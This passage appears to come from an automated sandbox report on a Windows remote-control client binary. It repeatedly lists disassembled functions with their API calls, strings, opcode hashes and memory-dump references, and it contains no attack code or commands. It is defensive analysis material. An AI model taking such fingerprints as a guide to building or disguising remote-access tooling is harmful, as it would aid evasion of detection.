                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                    • API String ID: 624642848-3840833929
                                                                                    • Opcode ID: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                    • Instruction ID: f6d3c874c1d1c48a5cbc4b1d223e4c094ec3a892b4c0f1e6412567ed65325da8
                                                                                    • Opcode Fuzzy Hash: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                    • Instruction Fuzzy Hash: F061C775E04285DFD715CF68C480FAABBF6FB08318F0985A9E8968B2C1D774E944CB94
                                                                                    Function 11093180 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                      • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                      • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                      • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                      • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 3136964118-2830328467
                                                                                    • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                    • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                    • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                    • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                    Function 11137070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 111370A6
                                                                                    • _free.LIBCMT ref: 111370DD
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • _free.LIBCMT ref: 1113716D
                                                                                      • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                    • _free.LIBCMT ref: 1113713E
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                    • String ID: *HelpReqServer$Client
                                                                                    • API String ID: 1390041139-3616015116
                                                                                    • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                    • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                    • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                    • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                    Function 11143360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                      • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                    • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                    • MessageBeep.USER32(00000000), ref: 11143427
                                                                                    • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                    • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                    • String ID: 1000,50
                                                                                    • API String ID: 3904670044-1941404556
                                                                                    • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                    • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                    • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                    • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                    Function 110612F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                    • API String ID: 2111968516-413741496
                                                                                    • Opcode ID: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                    • Instruction ID: 66cd83cde6406eed73dadf9a29febb3e9e016d9ffe8428f4573ae4edc325b04e
                                                                                    • Opcode Fuzzy Hash: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                    • Instruction Fuzzy Hash: 8E21DB75E041669BC301CF389C84DEE77ED9FC5369B14C251FDA69B685E631E904C390
                                                                                    Function 110B9000 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                    • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                      • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                    • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                    • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                    • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                    • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3235510773-0
                                                                                    • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                    • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                    • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                    • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                    Function 1100B270 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B280
                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
                                                                                      • Part of subcall function 1100A1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1EE
                                                                                      • Part of subcall function 1100A1D0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A218
                                                                                      • Part of subcall function 1100A1D0: GetLastError.KERNEL32 ref: 1100A220
                                                                                      • Part of subcall function 1100A1D0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A234
                                                                                      • Part of subcall function 1100A1D0: CloseHandle.KERNEL32(00000000), ref: 1100A23B
                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
                                                                                    • _free.LIBCMT ref: 1100B2F8
                                                                                    • _free.LIBCMT ref: 1100B2FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                    • String ID:
                                                                                    • API String ID: 705253285-0
                                                                                    • Opcode ID: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                    • Instruction ID: 1708c8f2d16fe6171f6400e7ced1c046c931d624ac1b1599b235a4591b72ed62
                                                                                    • Opcode Fuzzy Hash: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                    • Instruction Fuzzy Hash: 06117075904719ABE711CE70CC88BEFB3ECEB48399F000529FA6656144D774B545CB61
                                                                                    Function 1101D0F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 1101D0FE
                                                                                    • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                    • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                    • GetLastError.KERNEL32 ref: 1101D187
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 430917334-4108050209
                                                                                    • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                    • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                    • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                    • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                    Function 11003310 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                    • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                    • API String ID: 468487828-934300333
                                                                                    • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                    • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                    • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                    • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                    Function 11147110 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                    • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                    • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
